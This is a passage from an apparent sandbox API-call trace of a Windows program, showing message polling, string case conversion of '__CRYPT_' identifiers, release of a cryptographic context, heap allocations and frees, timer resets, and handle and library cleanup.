lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0200.033] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0200.033] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0200.033] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0200.033] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0200.033] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0200.033] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0200.033] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0200.034] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0200.034] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0200.034] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.034] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0200.034] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.034] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0200.034] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.034] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.034] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.034] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0200.034] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0200.034] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.034] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0200.034] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0200.034] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0200.034] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0200.034] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0200.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0200.035] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0200.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0200.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0200.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0200.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0200.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0200.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0200.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0200.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0200.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0200.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0200.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0200.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0200.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0200.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0200.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0200.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0200.036] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0200.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0200.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0200.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0200.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0200.038] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0200.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0200.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0200.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0200.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0200.038] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 1 [0200.038] TranslateMessage (lpMsg=0x8cf138) returned 0 [0200.038] DispatchMessageW (lpMsg=0x8cf138) returned 0x0 [0200.038] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0200.038] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0200.039] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0200.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0200.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0200.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0200.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0200.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.039] FreeLibrary (hLibModule=0x756e0000) returned 1 [0200.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0200.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0200.039] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0200.039] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0200.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0200.039] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0200.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0200.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0200.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0200.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0200.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0200.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0200.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0200.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0200.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0200.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0200.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0200.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0200.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0200.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0200.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0200.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0200.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0200.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0200.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0200.040] CloseHandle (hObject=0x2d0) returned 1 [0200.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0200.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0200.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0200.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0200.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0200.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0200.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0200.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0200.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0200.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0200.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0200.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0200.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0200.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0200.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0200.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0200.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0200.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0200.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0200.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0200.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0200.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0200.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0200.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0200.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0200.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0200.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0200.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0200.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0200.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0200.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0200.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0200.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0200.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0200.047] CloseHandle (hObject=0x2a0) returned 1 [0200.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0200.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0200.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0200.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0200.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0200.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0200.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0200.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0200.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0200.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0200.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0200.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0200.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0200.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0200.308] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0200.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0200.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0200.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0200.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0200.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0200.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0200.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0200.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0200.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0200.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0200.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0200.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0200.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0200.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0200.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3d0d008 | out: hHeap=0x970000) returned 1 [0200.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0200.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0200.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0200.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0200.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 